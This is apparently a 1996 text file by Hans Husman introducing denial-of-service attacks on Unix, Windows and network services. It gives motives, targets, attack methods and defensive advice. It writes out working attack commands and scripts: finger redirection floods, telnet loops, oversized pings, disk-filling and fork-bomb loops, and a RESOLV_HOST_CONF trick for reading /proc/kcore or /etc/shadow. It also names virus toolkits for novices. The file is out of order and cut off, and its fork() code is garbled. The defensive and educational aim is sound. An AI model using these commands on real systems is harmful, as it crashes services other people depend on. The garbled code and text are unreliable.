it is always good to read the proper RFC. You can find a nice sRFC
index search form at URL:
http://pubweb.nexor.co.uk/public/rfc/index/rfc.html
.F.2. KEEPING UP TO DATE INFORMATION
------------------------------------
(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varius 40Hex Issues.
.F.3. BASIC INFORMATION
-----------------------
(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books: - Teal Green Book (Glossary of
Computer Security Terms).
- Bright Orange Book( A Guide
to Understanding Security Testing
and Test Documentation in Trusted
Systems).
- C1 Technical Report-001
(Computer Viruses: Preventation,
Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.
.H. COPYRIHT
------------
This paper is Copyright (c) 1996 by Hans Husman.
Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.
.I. DISCLAIMER
--------------
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
t95hhu@student.tdb.uu.se
Last updated: Mon Oct 28 14:56:31 MET 1996
.0. FOREWORD
.A. INTRODUCTION
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
.A.2.1. INTRODUCTION
.A.2.2. SUB-CULTURAL STATUS
.A.2.3. TO GAIN ACCESS
.A.2.4. REVENGE
.A.2.5. POLITICAL REASONS
.A.2.6. ECONOMICAL REASONS
.A.2.7. NASTINESS
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
.B.2. BANDWIDTH
.B.3. KERNEL TABLES
.B.4. RAM
.B.5. DISKS
.B.6. CACHES
.B.7. INETD
.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
.C.2. UDP AND SUNOS 4.1.3.
.C.3. FREEZING UP X-WINDOWS
.C.4. MALICIOUS USE OF UDP SERVICES
.C.5. ATTACKING WITH LYNX CLIENTS
.C.6. MALICIOUS USE OF telnet
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
.C.8. HOW TO DISABLE ACCOUNTS
.C.9. LINUX AND TCP TIME, DAYTIME
.C.10. HOW TO DISABLE SERVICES
.C.11. PARAGON OS BETA R1.4
.C.12. NOVELLS NETWARE FTP
.C.13. ICMP REDIRECT ATTACKS
.C.14. BROADCAST STORMS
.C.15. EMAIL BOMBING AND SPAMMING
.C.16. TIME AND KERBEROS
.C.17. THE DOT DOT BUG
.C.18. SUNOS KERNEL PANIC
.C.19. HOSTILE APPLETS
.C.20. VIRUS
.C.21. ANONYMOUS FTP ABUSE
.C.22. SYN FLOODING
.C.23. PING FLOODING
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
.C.26. FLEXlm
.C.27. BOOTING WITH TRIVIAL FTP
.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
.D.2. CRASHING THE X-SERVER
.D.3. FILLING UP THE HARD DISK
.D.4. MALICIOUS USE OF eval
.D.5. MALICIOUS USE OF fork()
.D.6. CREATING FILES THAT IS HARD TO REMOVE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. CSH ATTACK
.D.9. CREATING FILES IN /tmp
.D.10. USING RESOLV_HOST_CONF
.D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT
.D.13. NETTUNE AND HP-UX
.D.14. SOLARIS 2.X AND NFS
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
.E. DUMPING CORE
.E.1. SHORT COMMENT
.E.2. MALICIOUS USE OF NETSCAPE
.E.3. CORE DUMPED UNDER WUFTPD
.E.4. ld UNDER SOLARIS/X86
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
.F.1.2. PORT SCANNING
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.5. EXTRA SECURITY SYSTEMS
.F.1.6. MONITORING SECURITY
.F.1.7. KEEPING UP TO DATE
.F.1.8. READ SOMETHING BETTER
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
.F.2.2. COMMANDS AND SERVICES
.F.2.3. PROGRAMS
.F.2.4. ACCOUNTING
.G. SUGGESTED READING
.G.1. INFORMATION FOR DEEPER KNOWLEDGE
.G.2. KEEPING UP TO DATE INFORMATION
.G.3. BASIC INFORMATION
.H. COPYRIGHT
.I. DISCLAIMER
.0. FOREWORD
------------
In this paper I have tried to answer the following questions:
- What is a denial of service attack?
- Why would someone crash a system?
- How can someone crash a system.
- How do I protect a system against denial of service attacks?
I also have a section called SUGGESTED READING were you can find
information about good free information that can give you a deeper
understanding about something.
Note that I have a very limited experience with Macintosh, OS/2 and
Windows and most of the material are therefore for Unix use.
You can always find the latest version at the following address:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT
Feel free to send comments, tips and so on to address:
t95hhu@student.tdb.uu.se
.A. INTRODUCTION
~~~~~~~~~~~~~~~~
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------
Denial of service is about without permission knocking off
services, for example through crashing the whole system. This
kind of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
---------------------------------------
.A.2.1. INTRODUCTION
--------------------
Why would someone crash a system? I can think of several reasons
that I have presentated more precisely in a section for each reason,
but for short:
.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.
I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.
.A.2.2. SUB-CULTURAL STATUS
---------------------------
After all information about syn flooding a bunch of such attacks
were launched around Sweden. The very most of these attacks were
not a part of a IP-spoof attack, it was "only" a denial of service
attack. Why?
I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their carrer with denial of service attacks.
.A.2.3. TO GAIN ACCESS
----------------------
Sometimes could a denial of service attack be a part of an attack to
gain access at a system. At the moment I can think of these reasons
and specific holes:
.1. Some older X-lock versions could be crashed with a
method from the denial of service family leaving the system
open. Physical access was needed to use the work space after.
.2. Syn flooding could be a part of a IP-spoof attack method.
.3. Some program systems could have holes under the startup,
that could be used to gain root, for example SSH (secure shell).
.4. Under an attack it could be usable to crash other machines
in the network or to deny certain persons the ability to access
the system.
.5. Also could a system being booted sometimes be subverted,
especially rarp-boots. If we know which port the machine listen
to (69 could be a good guess) under the boot we can send false
packets to it and almost totally control the boot.
.A.2.4. REVENGE
---------------
A denial of service attack could be a part of a revenge against a user
or an administrator.
.A.2.5. POLITICAL REASONS
-------------------------
Sooner or later will new or old organizations understand the potential
of destroying computer systems and find tools to do it.
For example imaginate the Bank A loaning company B money to build a
factory threating the environment. The organization C therefor crash A:s
computer system, maybe with help from an employee. The attack could cost
A a great deal of money if the timing is right.
.A.2.6. ECONOMICAL REASONS
--------------------------
Imaginate the small company A moving into a business totally dominated by
company B. A and B customers make the orders by computers and depends
heavily on that the order is done in a specific time (A and B could be
stock trading companies). If A and B can't perform the order the customers
lose money and change company.
As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B:s computer systems a number of times. A year later A
is the dominating company.
.A.2.7. NASTINESS
-----------------
I know a person that found a workstation where the user had forgotten to
logout. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the login time and placed a call to
the program from the profile file. That is nastiness.
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------
This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.
A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.
Unix systems are much more complex and have hundreds of built in programs,
services... This always open up many ways to crash the system from
the inside.
In the normal Windows NT and 95 network were is few ways to crash
the system. Although were is methods that always will work.
That gives us that no big different between Microsoft and Unix can
be seen regardning the inside attacks. But there is a couple of
points left:
- Unix have much more tools and programs to discover an
attack and monitoring the users. To watch what another user
is up to under windows is very hard.
- The average Unix administrator probably also have much more
experience than the average Microsoft administrator.
The two last points gives that Unix is more secure against inside
denial of service attacks.
A comparison between Microsoft and Unix regarding outside attacks
are much more difficult. However I would like to say that the average
Microsoft system on the Internet are more secure against outside
attacks, because they normally have much less services.
.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.B.1. SWAP SPACE
----------------
Most systems have several hundred Mbytes of swap space to
service client requests. The swap space is typical used
for forked child processes which have a short life time.
The swap space will therefore almost never in a normal
cause be used heavily. A denial of service could be based
on a method that tries to fill up the swap space.
.B.2. BANDWIDTH
---------------
If the bandwidth is to high the network will be useless. Most
denial of service attack influence the bandwidth in some way.
.B.3. KERNEL TABLES
-------------------
It is trivial to overflow the kernel tables which will cause
serious problems on the system. Systems with write through
caches and small write buffers is especially sensitive.
Kernel memory allocation is also a target that is sensitive.
The kernel have a kernelmap limit, if the system reach this
limit it can not allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPU:s, screens and so
on, it it also used for ordinaries processes. Meaning that any system
can be crashed and with a mean (or in some sense good) algorithm pretty
fast.
For Solaris 2.X it is measured and reported with the sar command
how much kernel memory the system is using, but for SunOS 4.X there
is no such command. Meaning that under SunOS 4.X you don't even can
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. netstat -k can also be used and shows how much
memory the kernel have allocated in the subpaging.
.B.4. RAM
---------
A denial of service attack that allocates a large amount of RAM
can make a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack at
a NFS server is trivial. The normal NFS client will do a
great deal of caching, but a NFS client can be anything
including the program you wrote yourself...
.B.5. DISKS
-----------
A classic attack is to fill up the hard disk, but an attack at
the disks can be so much more. For example can an overloaded disk
be misused in many ways.
.B.6. CACHES
-------------
A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.
These caches are found on Solaris 2.X:
Directory name lookup cache: Associates the name of a file with a vnode.
Inode cache: Cache information read from disk in case it is needed
again.
Rnode cache: Holds information about the NFS filesystem.
Buffer cache: Cache inode indirect blocks and cylinders to realed disk
I/O.
.B.7. INETD
-----------
Well once inetd crashed all other services running through inetd no
longer will work.
.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------
Most fingerd installations support redirections to an other host.
Ex:
$finger @system.two.com@system.one.com
finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Lock at this:
$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack
All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, short free memory and a hard disk with
less free space, due to all child processes (compare with .D.5.).
The solution is to install a fingerd which don't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit to much.
.C.2. UDP AND SUNOS 4.1.3.
--------------------------
SunOS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the cause if the ip_options
indicate a wrong size of the packet.
The solution is to install the proper patch.
.C.3. FREEZING UP X-WINDOWS
---------------------------
If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025. In most cases 6000) could that
be used to freeze up the X-Windows system. This can be made with
multiple telnet connections to the port or with a program which
sends multiple XOpenDisplay() to the port.
The same thing can happen to Motif or Open Windows.
The solution is to deny connections to the X-Windows port.
.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------
It is simple to get UDP services (echo, time, daytime, chargen) to
loop, due to trivial IP-spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claim that the packet came from 127.0.0.1 (loopback) and the target
is the echo port at system.we.attack. As far as system.we.attack knows
is 127.0.0.1 system.we.attack and the loop has been establish.
Ex:
from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7
Note that the name system.we.attack looks like a DNS-name, but the
target should always be represented by the IP-number.
Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"
" A great deal of systems don't put loopback on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "
.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------
A World Wide Web server will fork an httpd process as a respond
to a request from a client, typical Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses ps. In most causes it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typical lynx clients. But note that the netstat
command could be used to detect the attack (thanks to Paul D. Robertson).
Some httpd:s (for example http-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those causes get
the server to loop (compare with .C.6.)
.C.6. MALICIOUS USE OF telnet
-----------------------------
Study this little script:
Ex:
while : ; do
telnet system.we.attack &
done
An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well
the point is that some pretty common firewalls and httpd:s thinks
that the attack is a loop and turn them self down, until the
administrator sends kill -HUP.
This is a simple high risk vulnerability that should be checked
and if present fixed.
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------
If the attacker makes a telnet connections to the Solaris 2.4 host and
quits using:
Ex:
Control-}
quit
then will inetd keep going "forever". Well a couple of hundred...
The solution is to install the proper patch.
.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------
Some systems disable an account after N number of bad logins, or waits
N seconds. You can use this feature to lock out specific users from
the system.
.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------
Inetd under Linux is known to crash if to many SYN packets sends to
daytime (port 13) and/or time (port 37).
The solution is to install the proper patch.
.C.10. HOW TO DISABLE SERVICES
------------------------------
Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some SunOS systems that have the
default set to 48...
The solutions is to set the number to something reasonable.
.C.11. PARAGON OS BETA R1.4
---------------------------
If someone redirects an ICMP (Internet Control Message Protocol) packet
to a paragon OS beta R1.4 will the machine freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.
The solution is to install the proper patch.
.C.12. NOVELLS NETWARE FTP
--------------------------
Novells Netware FTP server is known to get short of memory if multiple
ftp sessions connects to it.
.C.13. ICMP REDIRECT ATTACKS
----------------------------
Gateways uses ICMP redirect to tell the system to override routing
tables, that is telling the system to take a better way. To be able
to misuse ICMP redirection we must know an existing connection
(well we could make one for ourself, but there is not much use for that).
If we have found a connection we can send a route that
loses it connectivity or we could send false messages to the host
if the connection we have found don't use cryptation.
Ex: (false messages to send)
DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG
The effect of such messages is a reset of the connection.
The solution could be to turn ICMP redirects off, not much proper use
of the service.
.C.14. BROADCAST STORMS
-----------------------
This is a very popular method in networks there all of the hosts are
acting as gateways.
There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that don't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.
Services that can be misused as tools in this kind of attack is for
example ping, finger and sendmail. But most services can be misused
in some way or another.
.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------
In a email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a replay and if the address is false will the mail bounce back. In
that cause have one mail transformed to three mails. The effect on the
bandwidth is obvious.
There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".
.C.16. TIME AND KERBEROS
------------------------
If not the the source and target machine is closely aligned will the
ticket be rejected, that means that if not the protocol that set the
time is protected it will be possible to set a kerberos server of
function.
.C.17. THE DOT DOT BUG
----------------------
Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.
The solution is to install the proper patch.
.C.18. SUNOS KERNEL PANIC
-------------------------
Some SunOS systems (running TIS?) will get a kernel panic if a
getsockopt() is done after that a connection has been reset.
The solution could be to install Sun patch 100804.
.C.19. HOSTILE APPLETS
----------------------
A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:
1) Problems due to bugs.
2) Problems due to features in the language.
In group one we have for example the java bytecode verifier bug, which
makes is possible for an applet to execute any command that the user
can execute. Meaning that all the attack methods described in .D.X.
could be executed through an applet. The java bytecode verifier bug
was discovered in late March 1996 and no patch have yet been available
(correct me if I'am wrong!!!).
Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JDK 1.0.1.
Group two are more interesting and one large problem found is the
fact that java can connect to the ports. Meaning that all the methods
described in .C.X. can be performed by an applet. More information
and examples could be found at address:
http://www.math.gatech.edu/~mladue/HostileArticle.html
If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disable.
.C.20. VIRUS
------------
Computer virus is written for the purpose of spreading and
destroying systems. Virus is still the most common and famous
denial of service attack method.
It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of virus it
is easy. Several automatic toolkits for virus construction could
also be found, for example:
* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).
PS-MPC and VCL is known to be the best and can help the novice programmer
to learn how to write virus.
An automatic tool called MtE could also be found. MtE will transform
virus to a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be catch by any scanner.
.C.21. ANONYMOUS FTP ABUSE
--------------------------
If an anonymous FTP archive have a writable area it could be misused
for a denial of service attack similar with with .D.3. That is we can
fill up the hard disk.
Also can a host get temporarily unusable by massive numbers of
FTP requests.
For more information on how to protect an anonymous FTP site could
CERT:s "Anonymous FTP Abuses" be a good start.
.C.22. SYN FLOODING
-------------------
Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.
As we know the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is the attacker host
will send a flood of syn packet but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection, a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.
The syn flooding attack is very hot and it is easy to find more information
about it, for example:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".
[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane
[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine
.C.23. PING FLOODING
--------------------
I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.
Under Unix we could try something like: ping -s host
to send 64 bytes packets.
If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------
If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:
ping -l 65510 address.to.the.machine
And the machine will freeze or reboot.
Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------
The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.
The host should not accept the message any time but under the reboot.
.C.26. FLEXlm
-------------
Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.
# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#
.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------
To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.
.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------
Solaris 2.3 will get a kernel panic if this
is executed:
EX:
$ndd /dev/udp udp_status
The solution is to install the proper patch.
.D.2. CRASHING THE X-SERVER
---------------------------
If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.
Ex:
$ rm /tmp/.x11-unix/x0
.D.3. FILLING UP THE HARD DISK
-----------------------------
If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.
Ex:
while : ;
mkdir .xxx
cd .xxx
done
.D.4. MALICIOUS USE OF eval
---------------------------
Some older systems will crash if eval '\!\!' is executed in the
C-shell.
Ex:
% eval '\!\!'
.D.5. MALICIOUS USE OF fork()
-----------------------------
If someone executes this C++ program the result will result in a crash
on most systems.
Ex:
#include
#include
#include
main()
{
int x;
while(x=0;x<1000000;x++)> -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$
Ex.II.
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$
(You see the size do count!)
Other well know methods is files with odd characters or spaces
in the name.
These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./
the first example if you have a shell.
.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------
Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.
Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.
If the impact is not big enough you should create more files or launch
more processes.
.D.8. CSH ATTACK
----------------
Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.
Ex:
|I /bin/csh
nodename : **************b
.D.9. CREATING FILES IN /tmp
----------------------------
Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.
.D.10. USING RESOLV_HOST_CONF
-----------------------------
Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read in the variable and access through ping.
Ex:
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf
.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------
Thanks to Mr David Honig
" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."
" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."
.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------
ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the
passwd file be set to zero.
.D.13. NETTUNE AND HP-UX
------------------------
/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:
- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.14. SOLARIS 2.X AND NFS
--------------------------
If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------
By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.
$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------
Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.
.E. DUMPING CORE
~~~~~~~~~~~~~~~~
.E.1. SHORT COMMENT
-------------------
The core dumps things don't really belongs in this paper but I have
put them here anyway.
.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------
Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.
Ex:
.E.3. CORE DUMPED UNDER WUFTPD
------------------------------
A core dumped could be created under wuftp with two different
methods:
(1) Then pasv is given (user not logged in (ftp -n)). Almost all
versions of BSD:s ftpd.
(2) More than 100 arguments is given with any executable
command. Presents in all versions of BSD:sd ftpd.
.E.4. ld UNDER SOLARIS/X86
--------------------------
Under Solaris 2.4/X86 ld dumps core if given with the -s option.
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.F.1. BASIC SECURITY PROTECTION
-------------------------------
.F.1.1. INTRODUCTION
--------------------
You can not make your system totally secured against denial of service
attacks but for attacks from the outside you can do a lot. I put this
work list together and hope that it can be of some use.
.F.1.2. SECURITY PATCHES
------------------------
Always install the proper security patches. As for patch numbers
I don't want to put them out, but that doesn't matter because you
anyway want to check that you have all security patches installed,
so get a list and check! Also note that patches change over time and
that a solution suggested in security bulletins (i.e. CERT) often
is somewhat temporary.
.F.1.3. PORT SCANNING
---------------------
Check which services you have. Don't check with the manual
or some configuration file, instead scan the ports with sprobe
or some other port scanner. Actual you should do this regualy to see
that anyone don't have installed a service that you don't want on
the system (could for example be service used for a pirate site).
Disable every service that you don't need, could for example be rexd,
fingerd, systat, netstat, rusersd, sprayd, pop3, uucpd, echo, chargen,
tftp, exec, ufs, daytime, time... Any combination of echo, time, daytime
and chargen is possible to get to loop. There is however no need
to turn discard off. The discard service will just read a packet
and discard it, so if you turn off it you will get more sensitive to
denial of service and not the opposite.
Actual can services be found on many systems that can be used for
denial of service and brute force hacking without any logging. For
example Stock rexec never logs anything. Most popd:s also don't log
anything
.F.1.4. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
---------------------------------------------------------
Check that attacks described in this paper and look at the
solution. Some attacks you should perform yourself to see if they
apply to your system, for example:
- Freezing up X-Windows.
- Malicious use of telnet.
- How to disable services.
- SunOS kernel panic.
- Attacking with lynx clients.
- Crashing systems with ping from Windows 95 machines.
That is stress test your system with several services and look at
the effect.
Note that Solaris 2.4 and later have a limit on the number of ICMP
error messages (1 per 500 ms I think) that can cause problems then
you test your system for some of the holes described in this paper.
But you can easy solve this problem by executing this line:
$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0
.F.1.5. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
--------------------------------------------------------
Check the inside attacks, although it is always possibly to crash
the system from the inside you don't want it to be to easy. Also
have several of the attacks applications besides denial of service,
for example:
